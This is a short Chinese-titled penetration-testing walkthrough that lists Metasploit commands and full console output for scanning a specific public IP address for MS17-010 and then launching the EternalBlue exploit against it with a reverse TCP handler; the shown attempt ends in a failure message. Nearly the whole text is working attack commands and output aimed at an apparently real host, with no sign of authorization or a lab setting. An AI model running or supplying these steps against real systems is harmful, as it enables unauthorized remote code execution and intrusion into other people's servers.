ms17-010渗透测试操作步骤

使用的命令

search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 47.92.84.135
run
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 47.92.84.135
exploit

详情

msf5 > search ms17-010

Matching Modules

================

# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------

0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection

2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts

CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts

CHECK_PIPE false no Check for named pipe on vulnerable hosts

NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check

RHOSTS yes The target address range or CIDR identifier

RPORT 445 yes The SMB service port (TCP)

SMBDomain . no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 47.92.84.135

RHOSTS => 47.92.84.135

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1

[*] 47.92.84.135:445 - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

RHOSTS yes The target address range or CIDR identifier

RPORT 445 yes The target port (TCP)

SMBDomain . no (Optional) The Windows domain to use for authentication

SMBPass no (Optional) The password for the specified username

SMBUser no (Optional) The username to authenticate as

VERIFY_ARCH true yes Check if remote architecture matches exploit Target.

VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Exploit target:

Id Name

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 47.92.84.135

RHOSTS => 47.92.84.135

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 172.17.0.2:4444

[+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1

[*] 47.92.84.135:445 - Connecting to target for exploitation.

[+] 47.92.84.135:445 - Connection established for exploitation.

[+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply

[*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)

[*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2

[*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris

[*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P

[*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1

[+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 47.92.84.135:445 - Trying exploit with 12 Groom Allocations.

[*] 47.92.84.135:445 - Sending all but last fragment of exploit packet

[*] 47.92.84.135:445 - Starting non-paged pool grooming

[+] 47.92.84.135:445 - Sending SMBv2 buffers

[+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 47.92.84.135:445 - Sending final SMBv2 buffers.

[*] 47.92.84.135:445 - Sending last fragment of exploit packet!

[*] 47.92.84.135:445 - Receiving response from exploit packet

[+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 47.92.84.135:445 - Sending egg to corrupted connection.

[*] 47.92.84.135:445 - Triggering free of corrupted buffer.

[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=